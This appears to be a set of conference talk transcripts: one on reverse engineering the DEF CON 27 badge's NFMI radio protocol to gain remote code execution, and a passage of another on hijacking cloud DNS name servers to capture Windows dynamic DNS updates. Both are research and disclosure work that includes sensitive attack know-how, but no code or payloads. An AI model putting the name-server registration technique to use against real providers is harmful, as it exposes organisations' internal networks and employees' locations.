narrowed down to a very precise frequency. It was working very well until I broke the badge and then it switched to 1.4. And then later on I fixed another badge I had broken earlier and it was using 1.569 megahertz. So I don't quite understand why the frequency bounces around so much. I was initially using a sample rate of two million samples per second, but the timing didn't work out. I said, oh, well, obviously, if it's 596 kilohertz bandwidth, then I need to use a multiple of that for the sample rate. So I used 1.192, but that didn't work out either. And I ended up using this 1.19055 and that worked out perfectly for 440 samples per packet or four samples per symbol. Why that number? I don't know. I'm using hackrf to receive the signal. It does the down conversion and resampling, so I can use it easier to use frequency and use a much lower sampling rate because your sampling rate must be at least twice your highest frequency in your signal. And then I used GNU radio to write my demodulator. Now there were some examples online of some lower order, like some 4PSK demodulators and modulators. And I figured it would be easy enough to modify one of those into 8PSK, but it ended up being a nightmare. The examples used components that don't exist or never worked or were broken for other reasons and not documented and no one could help and the docs were amassed. It was kind of a nightmare. So I made a bunch of working examples of different flavors of my PSK modulators and demodulators and I put them all on GitHub to help other people out. Now I had to deal with noise and nulls. There's 271 copies of the same packet, but they varied a bunch. But only some of that was the noise. It turns out that because of those null symbols at the beginning, a normal PSK demodulator doesn't understand what those are and tries to put them into one of those 8 quadrants. So it kind of interprets them as 8 for 3 random symbols. And then after those nulls there seemed to be an actual random symbol, which is why there was 8 different variations of both the preamble and of the packet. Now the nulls were new to me all together and you could maybe even call it like a sort of a ninth symbol in a constellation. I googled around trying to find out other examples of it and NXP, the maker of this NFMI chip, they also make this CoolFlex DSP audio chip and it also uses a similar modulation scheme with nulls and those nulls are used for finding the timing of a signal. So my demodulator spits out a stream of symbols, which I then manually parsed here just to make them more readable. You can see section 1 is 21 copies of just blasts of that signal basically junk in those symbols. Section 2, we see that preamble copied twice, followed by a little bit of noise and I think mostly nulls. Section 3 is just some more timing blasts and then section 4 is where our actual data lives. These are the symbols for our packets, 271 copies of them, they should be identical, they're not because of some noise. So I had to write a Python program to basically ignore the first few bytes or few symbols, then count up all the different patterns of packets that each flavor packet are in there and then whichever one has the most copies is judged to be the correct copy and that's the one copy of that one is output. The preamble consists of 20 fixed symbols and then 12 that can be in one of three patterns. Section 2 seems to flip randomly between two different sequences of those 12 preamble symbols. I don't know what they meant, I assumed that the one with mostly zeros could be like the mast for all zeros but it doesn't quite seem to be right, it could be, I don't know, never really figured that out. And then section 4, every single packet always starts with the same preamble, which is different than the other two. And here we see the structure of the entire packet, we got the header that has those nulls and that little random byte or random symbol referring to as the primer and then the preamble, then we have the packet data which is 64 symbols corresponding to 16 bytes. The first four bytes appear to be a counter, then there's one byte that is used as the length field for the user data and then there's 11 bytes available for user data but the badge only uses the first eight, the last three are just left unused. And then the footer has what, well, 10 symbols that change with every single packet as the counter increments so I assumed it was a checksum or CRC of some sort. Now I need to find the mask, the zero mask for all of the data because if you fill a packet with zeros in the data fields you don't get a packet full of zero symbols, you get a random looking pattern of symbols. This is the mask that they've used to either obfuscate what's being transmitted or maybe it's used for spread spectrum or noise resistance or something, not entirely sure but basically when you send an empty packet you don't send all zeros, you send a pattern. So I was able to easily change the first eight bytes to zeros and confirm that there's this crazy mask. Later on I modified the firmware to allow me to send the MCU badge firmware to allow me to send 11 bytes in a packet, set all those to zeros and that's what the pattern you see on the bottom of the screen. Though I didn't actually see any sort of pattern in this pattern. Finding the mask for the other data bytes was a little more difficult. I was basically able to confirm that the counter was counting, it was counting by binary values except it was counting by twos. I didn't know if it was starting off odd or even, I basically had to guess. Because of the tail that it has in changed symbols that was covering up some of the other symbols. So I needed a way to figure out something. I observed the counter incrementing in that binary fashion, decided well I'll just record it for a week. Eventually it found that after about a week it finally flipped the tenth symbol. So I was able to get ten of the mask symbols and then the tail changed afterwards. I have no idea what those bits are so I don't know if they're ones or zeros. Only the green is what I'm positive or so I thought were zeros based on my guess of what was odd or even at the beginning. I realized that it took 19.1 hours to get the ninth, almost a week to get the tenth symbol. It was going to take decades to get 16 symbols and over 9000 years to get all 20. I tried to brute force them but I just didn't know enough about the math of what was going on with these symbols and the values. So I couldn't brute force them and I needed a smarter way. Then I got lucky by becoming unlucky. I murdered a badge. I got really angry, it started transmitting a weird pattern instead of 110 symbol packets. It was doing 108 symbols and 108 nulls. It transmitted a different frequency and even weirder. The counter slid over by 4 bytes. So now instead of counting at byte 0 for 3 it was counting at 4 through 7. I assumed initially that it set those first 4 bytes to all zero. But by watching it count the upper bytes that let me confirm the mask for the length byte and helped me to do some other bytes as well. So I finally got the mask of the first 5 bytes. So at least assuming my 0 slash 1 guess was correct. It was odd or even that I was starting with. So sometimes it's better to be lucky than smart. So I finished this up. We'll kind of fast forward to the future a little bit. But I later on discovered that whenever you update the transmission badge or the packet that the badge transmits to other badges. It makes the counter count whatever it's counting count super fast. Almost 350,000. So I wrote a script to count over and over and over and that advanced all the bytes of the counter which let me confirm more mask bits. It also let me confirm that my initial guess was 0. Well that and the erratic counting later on in the future when I was decoding the sequential count. But should be sequential. It wasn't always sequential. It was bouncing around by 8 or 32 here and there. And I realized because my initial guess was wrong. So that guess that what I found above as a mask was actually the mask for the value of 1. It was really a mask of 0. But that also means that when I broke that badge instead of all the bytes being 0 it was also started at 1 which is weird. I don't know what that means. Next I need to find the checksum mask but really there's no way I can figure that out right now. All I can do is at least until I figure out the algorithm and then figure out the data and then figure out which part of the packet that the algorithm actually protects. Like does it protect the preamble or not? You know. So basically I just guessed by picking symbols that I already seen in the packet called that 0 or just whatever and moved on. So one thing that the counter indicated was convolution code is being used. So for every odd bit that's changed whereas we're defining an odd bit as bit 1 with LSB being bit 0. So bit 1, bit 3, bit 5, any of those change. Only a single symbol is changed. But if an even bit is changed then 6 of the next 7 bits or symbols are changed. Now that pattern looked suspiciously like the one used by the Voyager space probe. I don't know if that's coincidence or if that's somehow been adapted to use this into the badge transmission. I haven't figured that part out yet. It's also odd that only half of the bits are being protected because normally you'd want to protect all the bits from noise only having half. It doesn't do you much good. So to reverse engineer this I started by changing just one bit at a time whenever you change one odd bit. That would just change one symbol and it always adds 4 to the symbol. If you change one even bit then 6 of the next 7 symbols change and in a pattern that depended on how far away that symbol was from the bit that was changed and based on the 0 mask that was used at that location. So I figured out the pattern through just a lot of making examples and taking lots of notes and making crazy excel sheets. And finally figured out the math of how a mask changes each bit at each position. I've listed it by the symbol positions and then also listed it twice in 2 ways. One is the code, the Python code of where the mask is, what values the mask is and then if that mask existed at that position, like say mask is in 1, 2, 1, 2, 5 or 6. So if it is and that's a 1 times 4 plus 2. And as a more lower level electrical engineer sort of way to think about it I also included an array of bits. So you can look at the bit math and possibly that could be related to the Voyager Pro but we'll worry about that later. So that figured out for a single bit but once you start using 2 bits or changing 2 bits at a time then the math gets really ugly again and it just goes crazy. And I tried coming up with really complicated algorithms to figure it all out but I eventually realized well instead of doing that let me just treat everything as just a mask. Every sum of every step is the mask of the next step and made 7 different steps like that and it all worked out. So here it is stepping through that where you start off with the mask and then if you follow those rules from earlier to change, if a bit changes then you add say 6. Compute the sum, that sum becomes the mask for the next row, the next, the next, the next. So that rule of course doesn't make any difference if you're only changing 1 bit but when you're changing 2 bits say if the mask is 3, position 0 you add 3 plus 2 you get the sum of 5. Now you use 5 as the mask for the next bit down on and on and it actually worked. Except when I started decoding the counter it didn't always count sequentially, it did most of the time but every now and then it would freak out and then go back to working again. And I realized that sometimes odd bits are convolved when it's multiple odd bits that have been flipped. But there wasn't much rhyme or reason to it, I just started looking for patterns and any time I found a pattern that worked for a lot of the problems that would code that pattern out. That would solve most of them but then a few more would slip through, just did that a few times and ended up with these 4 rules. All of the rules are interesting that they don't care what the current bit is, they only look at previous bits. Some of them, 2 of the rules care if previous bits were 0 instead of 1, all those X's are the don't cares. You can see the rules are mostly don't cares. But now we know the answer that all the bits have some sort of convolution code protecting them. The first convolution code that we saw earlier could be that Voyager code, could be a Trellis code modulation, I don't know if that's actually possible. But I won't go into that. And then the other convolution code is, I have no idea. I made that little circuit diagram for how I think it works but other than that I didn't recognize it in anything I looked up online. So now I need to reverse engineer the CRC. And early on I noticed that each packet, the CRC has a possibility to contain basically 20 bits of data in those 10 symbols. But when I count it up, the number of patterns that actually showed up, it was only 2 to the 12 or 4096 patterns. So that was telling me it was storing 12 bits in 20 bits, which was strange. And then there was also the issue that when you change a bit, you can have a tail of up to 6 changes behind it. And won't that tail of changes overwrite the nulls and primers and destroy the packets? So something odd was going on here. I also confirmed that all of those symbols had to be used because if you tried changing any of them, then the packet was rejected. So clearly all those symbols were being checked. So they all were important in one way or the other. And so I need to reverse engineer the CRC if I ever wanted to make some of my own custom packets. I tried this tool called CRC Revenge and it just didn't seem to work at all on the values I was pulling out. So I said, fine, screw it, I'll just write a Python program and brute force every possible CRC algorithm. And that didn't work either. So something really odd was going on. While looking through the CRC values of a bunch of packets in sequential order, I noticed that the checksum was changing by a predictable amount. Like every time just the lowest bit changed, it was XORing the checksum value by the same amount. Which told me that the checksum was being built up by XOR probably from a table, just like CRC. And I hope to do that some more, eventually find a pattern to it. But in the beginning what I did was I used all the counter values to find where just a single bit changed between two packets. XORed those packets, or XORed the CRCs from those and that gave me the XOR value for that single bit change. Did that for all the counter bits. Did that for a few of the length bytes. Couldn't really do it for all the counter because the high counter values would just take months to flip through. But since I realized that when you update a packet it fast forwards it by some 350,000 clicks. So I wrote a program to speed it through a whole lot of those bits. And then I wrote another program to do a bit walk. Basically change one bit in every data byte and walk that back and forth through all the data bytes. And then I wrote a cute little program to adjust all those and build up the CRC table. Now that I had most of the CRC table values for each bit, I was looking through the changes in them and noticed a couple patterns. And the first was a pattern in how the actual data bits are stored in those symbols. And it's kind of ingenious the way they're spread out. So the first two symbols holds four bits and the next symbol after that holds two bits. So basically the way that it spreads them out where the even bits are used and only the first three symbols, those even bits since they have a tail that can be six long, that tail doesn't extend past the end of the CRC. So it doesn't overwrite the nulls or anything like that. So basically it used mostly the odd bits to store bits from the CRC and just a few of those even bits. And it all fit. And then for just extra fun, I guess, they shuffled the order of those bits all around. And that shuffling is what made the CRC revenge fail, what made my brute force tools fail. Once I removed the dead bits and rearranged the bits that actually had useful info in them, then suddenly CRC revenge worked perfectly. So now I can compute the CRC table for all 16 bytes. I also noticed a pattern between the values for every single bit in my table. I can use that pattern to fill up the rest of the symbols. But with CRC revenge, that also showed me the exact name and algorithm used for the CRC. So that was nice. So now my original guess for the mask, I knew it was wrong in the beginning for the CRC zero mask. But it worked anyway because basically since the CRC is built up by XORs and it was basically XORing my bad mask, which had my bad base value and all those XORs were cancelling out. And it worked most of the time, but it was flaky probably because of those three bits of the tails that weren't quite XORs the way the tails changed. So once I figured out the new mask, everything worked like rock solid. It was beautiful. I think the CRC doesn't protect the preamble. I think it's only covering the data. I tried coming up with counter examples. I tried making a ton of different packets with using different preambles and testing all possible CRC values and couldn't make any other preamble work. So that's just an unknown. Also, I basically went with the assumption that the CRC of those 16 bytes, if they were all zero, that the end result would be zero because that's how CRCs work. And based my mask off that, and it worked. So with that, I can finally craft my own packets. Tools will be released on GitHub if they haven't been already. I can now basically make any 16 byte packet I want, except I need a 36 byte packet in order to overflow the badge and possibly even more to do any cool attack. To do this from the start, I assumed that would fall into place along the way, but it didn't happen. I never found a field in the packet that actually let me set a longer packet length. Screwing around the preamble didn't work. So it was time to try reverse engineering the NFMI firmware. To extract the NFMI firmware, I needed to run SWD. I needed to be able to access the reset line, which unfortunately was buried in the middle layer of the board. The ball on the ball grid array on the bottom of the chip also was not accessible. So I had to pick through slides and other info from the presentation, figured out which ball on the grid it was, and then I zoomed in really close on some of the slides that didn't have the middle image. It's from the slide. That's the circuit board before it has the white paint on it, so you can kind of see the middle traces faintly in the middle of the board. Also with one of my badges, I scraped all the white paint off and cut through the bottom layer of the badge to remove the metal ground plane and was able to shine light through it. Eventually Joe Grand actually was nice enough to send me some schematics that showed exactly where the reset lines were just to confirm. That helped me find the reset line. Now I need to connect to it. So as you can see in the top, I had to scrape the paint off and the top layer of the board to get down to that middle layer of the board. Kind of made like a little sea of flux on it based on a video I watched of repairing iPhones. So a little sea of flux and after a few tries I was able to solder a wire onto this trace that was smaller than human hair. I think this didn't actually work though. I had to go back and actually cut the trace and then do it again because the MCU was still connected to the reset and was like changing the reset while I was trying to change it with the SWD commands. So I think, I don't know, I think that second uglier image onto the right of the soldering is the second time I did it. So I was able to connect to it but when I hooked the J-Link up to it, to the SWD, it could not communicate with it because I didn't know what kind of chip it was. I was guessing different Cortex chips and nothing worked. I thought, well maybe I need pull-ups, maybe I need pull-downs, maybe there's noise, maybe I need to go slower. I tried everything, I tried going at like 1 kHz and nothing was working. So finally, out of desperation, I just started randomly trying the default settings for a whole bunch of different chips that were related or even kind of unrelated and then one of them just worked. So I quickly downloaded the entire memory space I could which was 0-18000 and realized at that point because I guess, I don't know, either screwing around earlier with the reset line being connected to two things or maybe cutting it or maybe just based on the way it boots up but whatever little snippet that the MCU firmware sends over to the NFMI chip wasn't there. So the protocol was missing but at least I got all of the other hidden stuff because the protocol only makes up like a few hundred, maybe a thousand bytes and I got a whole lot more than that and all those hidden functions and stuff so that was very helpful. So I pulled the NFMI protocol bit out of the MCU firmware figured out the base address of the different pieces of it and plopped that into the binary just pulled out that 18000 binary and stuck that into Ida Pro. Once again, I couldn't find anything indicating like a packet length field or anything like that and I also confirmed there's code that actually checks to make sure you're not claiming to send more than 11 bytes and fast forward to the future, I was able to remove that at one point it doesn't do me any good because I can't send more than actually 11 bytes so if I fake it, it'll try outputting it but it's outputting like zero that uninitialized garbage and it wasn't helpful. But I had seen oversized packets happen before and I'd even log them. As you can see in that log down there I'd hacked a badge firmware to spit out every byte received and the length and after a bazillion length 22s I got a length 52 and then it crashed so welcome to Defconn again. So obviously it's happened spontaneously in the wild, how do I make that happen? Well I was saved by some more bugs in the badge firmware. So when the NFMI chip sends a packet over the UART and it's all padded out, the badge receives it but instead of trying to copy the entire packet off of UART, it just copies one at a time. So that alone allows a partial packet to be copied if it runs out of space and then there was also this off by one error where it seemed to make sure there was always one more spot free. So basically it's checking for two bytes free before copying one byte and that allowed an odd number or an odd sized packet which was nice because it would just chop off just the E at the end and leave my B followed by however many bytes of data I had on there. So then later on when the badge actually tries to use that packet data, it starts with reading it to B and keeps on reading until it finds an E. So with these errors I was able to send a B and then 16 bytes of padded data and then no E. I can completely fill up the ring buffer by just sending a whole bunch of these and then I tell the badge to read and the moment it reads the first one now it's freed up 18 more bytes. So if as long as I'm still blasting these packets, it'll now write a second packet into that hole. So and then the badge will keep on reading everything and when it gets to that last packet, it sees a B and then 16 bytes of these padded nibbles and then another B and then another 16 and then an E. So as far as it's concerned, it just saw a 33 byte packet. But wait, there's more. So if you keep hammering that even more, it's possible to send even like the max size 11 bytes which ends up being 22 these padded nibbles. So I can send like a B22 and then it hits that off by one error and chops off the E and then when a packet gets read, it frees up enough space that if I'm still writing fast enough or transmitting fast enough, it can stick another B22 in there with no room for the E and then since the badge is reading faster than I can actually transmit, by the time I send a third one, it'll be more than enough space for that E to fit in there too. But basically I've now made a 68 byte packet. And then I haven't actually played with this but I could probably even fill the buffer first with like super tiny packets, like 2 byte packets to make reading take much longer and maybe you can stack even more than 3 of these B22s in our B22Es. So now I can crash a badge at will, a stock badge. This takes a long while with a 2048 byte buffer and it makes like a pretty boring demo. So I cheated and I made a badge that just has a 72 byte buffer. What I do is I basically fill up the buffer and then I drain the buffer. So now that I'm like at a known state and I fill the buffer again and read and keep on transmitting and see how that read happens and I'll actually crash the badge. So here the buffer is full. I'm going to empty the buffer. I switch over to new radio and start playing the packets as fast as I possibly can. A little faster than display can keep up with and completely fill the buffer. And the video glitches out for no reason. And then we go over here, see the packets and it crashes. A crash is neat but can we do something more interesting than that? Well unfortunately that padding gets added to every single packet and it's going to ruin any sort of attack that we try to send. That does something more interesting than just crash. So we need to cheat. I have found the, or took the firmware for the NFMI chip and found where it pads data and removed that. And found that BNE stuff also and removed that. We can still fake that if we want the badges to talk to each other like normal but now it's optional. I just found all that code and replaced it with no ops. But to install that code into the chip I had to figure out their crazy format first. Which was just proprietary and weird and slowed me down for a while. But once I finally got that in there I was able to do a lot more fun attacks. Here's a freshly removed badge. I switch over to GNU radio and I play my attack. It takes up four packets to fit the entire buffer overflow attack. Let's get loaded into the buffer, switch back to the badge. I tell the badge to read the packets and it executes my code. I'll end with a few oddities and mysteries that remain. Never quite understood what that initial packet that it sends out with that 0403 E045. At one point I convinced myself it was a buffer address. I don't quite remember why anymore. Sometimes when it's an error it sends a different code. I don't know what those mean. There's also a rev string and another value next to it. I was wondering is that supposed to be a frequency or something else? I was never quite sure about if it was truly a differential signal or a double differential signal. Because the preamble suggested it might be double. Never got figured out what the rest of the preamble meant. Not sure if the CRC protects it. Tried poking out a lot, didn't help. Where the heck does that mask come from? I spent a lot of while working on that trying to figure out its source. Couldn't figure that out. There's got to be an easy way to stream or send longer packets. That would be fun to play with if I could figure that out or someone else could. What is up with that convolution? Anyway, that's all. Thank you very much for watching my presentation.
|
The DEF CON 27 badge employed an obscure form of wireless communication: Near Field Magnetic Inductance (NFMI). The badges were part of a contest and while poking through the firmware for hints I noticed a buffer overflow flaw. All it required to exploit it was an oversized packet… via a chip with no datasheet and no documentation on the proprietary protocol. Thus started a 2 year odyssey. I used Software Defined Radio tools to study the signal’s modulations. I built a receiver in GNURadio and Python to convert signals into symbols, symbols obfuscated by a pattern that I had to deduce while only controlling a fraction of the bytes. Data was encoded in those symbols using proprietary convolution for even bits and Trellis Code Modulation for odd bits. I then reversed their bizarre CRC and wrote tools to craft and send packets. Using those tools I chained bugs in 2 chips and remotely crashed the badge. However, limitations in the NFMI protocol made more sophisticated attacks impossible. But after a year and a half invested, I was not about to give up. I soldered leads to middle layer traces, extracted and reverse engineered the NFMI firmware, fixed their protocol, and patched a badge FW to patch the NFMI FW. At long last I achieved what may be the world’s first, over-the-air, remote code exploit via NFMI.
|
10.5446/54237 (DOI)
|
Hello. That come today would present to you our research on the DNS vulnerability class in the DNS service providers. My name is here and I lead the research team at with the cloud security company. This mean the room is I'm in Ludwak. Hi, the city of. Thank you, share and it's really great to be here. And so let's start a bit of background about us. So we are the research team. We use the cloud security company. The team is a composed of experienced security researchers. Many of them with background from Microsoft cloud security group. And our goal is to do groundbreaking cloud research to find vulnerabilities, misconfigurations, risks in cloud environments that customers are not aware of and would impact anyone using the cloud. So we started looking into the NSS service. Why the NSS service. So first of all, DNS, as we all know, is the lifeblood of the Internet. It's probably one of the most important services that we have. Now, the NSS service has huge impact. If you think about it, it holds your domain. It holds your internal routing. Now what's cool about the NSS service, unlike usual cloud services is that also it controls not only cloud activities, right? When you use the NSS service, it also impacts your own premise activities. So potentially the NSS service has huge impact on an organization. Now on top of that, what is really great for researchers is the DNS protocol is one of the oldest protocols that we use. It's more than 20 years old. It's incredibly complex. And there's so many different implementations of it, both from the DNS providers, but also think about millions of DNS clients that we have out there, each of them implemented in a different way, creating a very, very interesting attack vector for researchers to explore. So we started from looking into Route 53, which is the DNS service provided by AWS, and it's a highly popular across AWS customers. So Route 53 is built on thousands of DNS servers that host DNS zones for all AWS customers. We mapped around 2000 servers in the Route 53 platform. Whenever a customer is hosting a domain on the platform, they get four shared name servers to manage the desired domain. On the right side of the slide, you can see a simulation of one out of the four DNS servers Amazon provides each domain. The server stores the DNS zones for with IO, for example, and several other AWS customers. If the server is queried for one of the domains under management, it will return the appropriate records for that domain. While studying the Route 53, we discovered that anyone can register any domain they want on the platform. There is no restriction on whether the domain is already hosted on the platform, and there is no ownership verification. The only limitation is that if the domain already exists in one of the name servers, it will not be possible to register it again on the same server. And it makes a lot of sense, and it's indeed not possible, trust us, we tried. Basically, anyone can register any domain on any of the name servers as long as it does not already exist there. But is there anything dangerous here? For me, as a security researcher, it felt like we had too much control here. But almost any DNS service provider works this way. So is it really a security problem? And this is an example that if you try to register with again on the server, it will be impossible because it's already there. So we started with a very, very simple and interesting research question. If we can register any domain, what domain can we possibly register that will give us interesting access to data? So we want to register a domain that is not already present on the name server, and that for some reason DNS clients will actually query for that. So we started into a quest to think what domains can register that no one thought about, and we could actually somehow break the DNS. So we thought about it and came up with an idea. What would happen if we register one of the official AWS name servers on the platform? What would happen if we register one of the Route 53 name servers under the same server? So we choose an arbitrary name server. In this case, it's the NS 1611, as you see on the slide, and we try to register it on the platform enough times. So at least once it would fall under the management of the same name server. Let's do an illustration of that. So as you can see the slide, we have an illustration of the NS 1611 name server, which is an official Route 53 name server. And you can see it already contains the NS zones for several of Route 53 customers. What do you think would happen if you manage to register the name server domain name NS 1611 under its own management? I totally don't know what would happen, but we must check it out. Definitely. So we tried it and it worked. As you can see on the slide, our new domain is now managed within a name server with the same domain name. We were really excited. We didn't know if it will have any impact, but we had a really good feeling about this one. So to test the effect of what we did, we decided to specify an IP record pointing to our server. So now, if a DNS client will connect to the NS 1611 name server and ask it about itself, it is our IP address that will be returned. At this point, we were really curious to know if anyone is asking Amazon's server about itself and if anyone is trying to connect with us because of the manipulation we did. So we ran TCP dump on our server and hope to see something interesting. Surprisingly, we started receiving thousands of requests from thousands of different IPs. We realized we were onto something. The next step in the research was to analyze all these DNS queries and figure out why these queries are being sent to us. So wait, why are we getting any traffic? No one was supposed to ask the name server for their own domain. The name server actual domain is registered on other name servers. So why are we getting any traffic? And what's more weird was that it wasn't actual regular traffic. It wasn't even DNS traffic. It was dynamic DNS traffic, which is a very specific protocol that you wouldn't even expect to see in this type of internet traffic. Now we were getting a lot of data and talking about IP addresses, computer names, domain names. So we started investigating. We started to look into the data. So basically we saw we were getting millions of actual requests from endpoints. And when we started looking into it, we saw it's a lot of data we are seeing internal IPs, external IPs, names of computers. We very quickly understood these are names of endpoints within many, many different organizations across the globe. And the scale was truly unbelievable. It's within a few hours of sniffing the traffic. We saw more than a million unique endpoints. And they would belong to based on the initial analysis we did. We saw more than 50,000 organizations, 15,000 organizations, all of them using AWS as a DNS service. Now we said, okay, let's try to figure out what organizations are we seeing here, right? So it was quickly we understood that we are stepping into an unbelievable tap of worldwide organization and traffic. We saw Fortune 500 companies, we saw more than 130 government agencies, right, in the traffic. So we knew we were probably onto something big, but the problem is that we had no clue what we are seeing and why. So what do we know so far? We registered a name server domain on the name server, right? We have no idea why, but for some reason, millions of endpoints started sending tons of dynamic queries to us. But again, why? Why are we seeing dynamic DNS before we are able to answer that simple, mysterious question? We have no way to actually understand what we're seeing. So we decided we are going to step into the world of dynamic DNS. So what is exactly dynamic DNS? Dynamic DNS is an extension to the DNS protocol, which is specified in RFC 2136. It allows clients to dynamically update DNS records of a target DNS server. And it's commonly used to help devices find each other in internal Windows networks. Let's see how it works. So when my Windows computer joined the company's network and received a new IP address, as you see on the slide, it updates the local DNS server, which is called master server when it's new IP address. Now, when Ami is trying to connect to my computer, he can query the local DNS server about share PC. And the master server will answer it with my current IP address. So far, sounds like a great feature. At the moment, it is still not clear to us why endpoints sends dynamic DNS updates to our server. These are requests that should never leave the internal network. Could it be that the endpoints think of our server as their master server? How does they even know how to find their master server? So it turns out Microsoft has its own algorithm for finding the master server. And it does not work exactly as specified in the RFC. Just before we go into the logic of the algorithm, let's do a brief refresh on DNS records for those who have not touched DNS recently. So in order to fully understand the algorithm, it is important to remember only three types of records. It will make it very quick. The first would be the A record. A record specify the IP address of which the domain points to. The second would be the NS record, which specify the name server of the domain name. The third is the SOA record, which is short for start of authority. The SOA records contain administrative information about the domain and its first parameter is the master server. This is the server in which clients will attempt to update during dynamic DNS updates. Usually this server will be on one of the domain's name servers. And in the last 50 screen, the different value of this field will be the first Amazon's name server from the name server's list. And now that we have already freshed our memory, let's get into the algorithm. This is the primary name server. So when a Windows endpoint want to update the internal master server for its new IP address, it first needs to find it. The endpoint will send the SOA query for the internal DNS resolver on its own fully qualified domain name. The internal DNS resolver knows that the WISIO DNS zone is managed internally. So with queried, it will return the internal master server within the SOA response. Now, when the endpoints found the master server, it will update it as we saw in the previous illustration. And the update succeed. But what happens if the corporate DNS resolver is not set correctly and does not contain a DNS zone for the local domain? Or what would happen when the computer leaves the organization and start working with external DNS resolvers provided by home routers? In that cases, when the computer query for the corporate domain, the DNS resolver will treat it as an external domain and will return the master server of the external domain just as it will do with any other domain. This is where the problem starts. So imagine an employee of WIS decided to work from home, like most of us lately, and connected to their home Wi-Fi. The computer got an internal IP address from the home router and now trying to find the local master server to update it. Because the external DNS resolver are not familiar with WISIO, it is going to resolve it just like any other domain. Because the domain is managed on Route 53, it will return the WISIO master server as specified in Route 53. The endpoint will then try to update the master server, which is an Amazon shared name server that manages thousands of customers. Obviously, Amazon servers does not support dynamic DNS, so the update request will fail. The thing is that the Microsoft's algorithm does not give up here. The algorithm believes it still has a chance to find the master server. So the next step would be to check if the WISIO's name servers have records for the master server. So the DNS client connects directly to the IP address of the name server and asks them, what is the IP address of the master server? In our case, it is the same domain name as the name server. And here happens the interesting part. In fact, Windows DNS clients queries the name server for itself. And if you remember, we have registered this DNS on and here we can return any record we want. So we returned our IP address to the DNS client and now the computer will update our server with DNS updates, which is the malicious actor server. And this is very crazy. So now we reached the point that we started understanding what's happening, right? Because what we know, we know the Windows endpoints, they use a custom algorithm to find the master DNS. The algorithm queries the name server for its own address. And when you are in external and using Route 53, what happens that this means that you're actually querying the name server for its own domain. And that explains what happens. That's why we are able to register our malicious DNS server and we're receiving this dynamic DNS traffic for millions of endpoints. Because all of the organizations using Route 53 when these devices are actually outside of the domain and outside of the company, they will actually use this algorithm and we will be able to get traffic from those devices. So we understood what's going on. The next step was to figure out how much data are we actually getting and what can you find from it. So when we started looking into the data, we quickly understood that we are actually building here what we call the nation state intelligence capability. Because think about it. We saw IPs for millions of endpoints from more than 15,000 organizations, but it's not just DNS requests. We are seeing external IPs, internal IPs, computer names. We are starting to map all of those organizations. So let's see what we can do with this scale of intelligence capabilities. So we started from what we call IP based intelligence. Imagine that you can map companies and a portion of companies around the world and map their global sites, map where their employees are at. So we looked at one company, for example, and just see how amazing this is. So this is one of the largest services companies in the world. And we got around 40K endpoints actively reporting from this company. Now, we are seeing a mapping of all of their global sites, all of their actual offices, the employee locations. So from just the external IPs, we can map, create a map of offices and home locations of employees across all of those companies. It's really amazing. And we can go even deeper. Like this is an example of a specific office where we detected 600 endpoints of that company, right? So imagine an intelligence capability that maps for you in one single tap into the DNS without any trace, actual structures of organizations across the world and all of their different offices and locations. So, but it doesn't stop there. Then we started thinking, okay, what interesting data can we pull from this if we're an intelligence agency now? So we started looking at companies that are in violation of the Office of Foreign Assets Control. We saw interesting things. For example, this mining company, it's an international mining company. And interestingly, we found six employees working from the Ivory Coast, which is definitely a place that is not allowed in that regulation at all. Right? And we saw so many interesting examples like that. So we found a subsidiary of a large credit union with a branch in Iran. Again, 13 endpoints working from Iran based on our new and newly revised intelligence capability. Right? So it's not only mapping all organizations, we can now start finding violations. We can ask questions across so many different agencies. You remember we are actually seeing also government agencies. I wonder where are all of their offices, right? Now, it doesn't stop there because if you remember external IPs is just a small portion of the data. Right? We also have internal IPs. So what can you do with internal IPs? If I have internal IPs from different endpoints from the company, I can start building the map of the network, the internal logical network of the company. So for example, these are the segments. This is the employee segment. This is the ICD. Here's the operation network. Remember that we also see names of devices so we can start really understanding all of the segments. So building an intelligence map of the organization externally and internally across thousands of organizations. Now, we also had computer names and the computer names actually hold information about the endpoint. Right? And many times you get employee names. You understand that the actual role of the machine. You can see the specific, the build the machines is using. Right? So we are actually getting quite a lot of information about those companies based on the IPs, the computer names. Here you see this is finance and we see all of those machines are part of the specific segment. Okay, perfect. I'm starting to build my internal map of this company. That's perfect. Now, just so we understand the scope here, we looked at the specific DNS provider. Then we asked, wait, is this only this DNS provider? So we started looking at others and we soon found there's many others also susceptible to the same vulnerabilities. Right? This is not just the ROD 53 vulnerability. This seems to be something that is shared across most of the DNS service providers. And if you think about it, we don't have to stop at the cloud providers. You have shared hosting. You have the main registrar. There is so many different service providers using, again, I think the shared concept here is that they provide DNS services for many, many different companies. And there is a chance that many, many of them are vulnerable to this attack of name server hijacking. So, we started from AWS. We reported the vulnerability and was fixed really, really quickly with the, by the AWS ROD 53 team. And again, I think within a week or two, it was fixed and no one can now utilize this vulnerability in ROD 53 because you're not allowed anymore to register those special domains in the name server. And we are in disclosure process with several additional cloud providers and we believe there is many, many more to come. And it's part also of what we call the industry to start looking into and actually check across all of the DNS providers. So, as I just said, AWS fixed the vulnerability very easily and they added all the names of their name servers to an ignore list, which is simple and very effective. Users trying to register one of the official AWS name servers on the ROD 53 platform and now receiving the follow error message, which says that the domain is invalid and you can see it on the slide. And when we report our discovery to Microsoft, they explained to us that this is a known mis-configuration that occur when the organization works with external DNS resolvers. And it's not considered as a vulnerability. So, we would like to offer a solution for both platforms and organizations, we would like to protect themselves from this kind of attacks. First, we will start with the platforms. DNS providers want to ensure they are not vulnerable, should make sure it is impossible to register their own domains on the platform. DNS providers want to have even a better security, can also do ownership verification to ensure users are only registered their own domains. And in addition, it is very important to make sure that the platform user cannot register a reserved name as specified in the DNSRFC. The RFC is full of reserved domains that should not be allowed to register and their gestation may lead to unexpected behavior. For an organization that want to make sure they are not vulnerable, we recommend making sure that the primary name server in their SOA record does not point to a different domain owned by the DNS provider. As you can see in the slide, and now you can see it, the different primary name server that a domain owner receives when they enter domains to the RFC 3 is the first of the four name servers which manage the DNS zone. Changing it to changing the primary name server to an invalid subdomain of the organization, or even the real primary master server will fix the issue. And attackers will not allow potential attackers to register a domain on the platform. As you can see in the slide, and yeah, we are very close to the end. So just a few summaries and takeaways. First of all, what's really cool here is that we are able to get to nation state intelligence capabilities from a simple domain registration. Just a simple domain registration got us so much power. And we believe what we saw here is a new class of the DNS vulnerabilities. This is just one idea of a domain. Think about how many different interesting domains you can try to register. And remember today you can basically write the register any domain that you want that will trigger unexpected results. No one thought and we honestly did understand initially what would be the impact of registering the name server on itself. I'm sure there's many other magic domains that you can register. And it opens up so many interesting questions like all of this traffic was dynamic 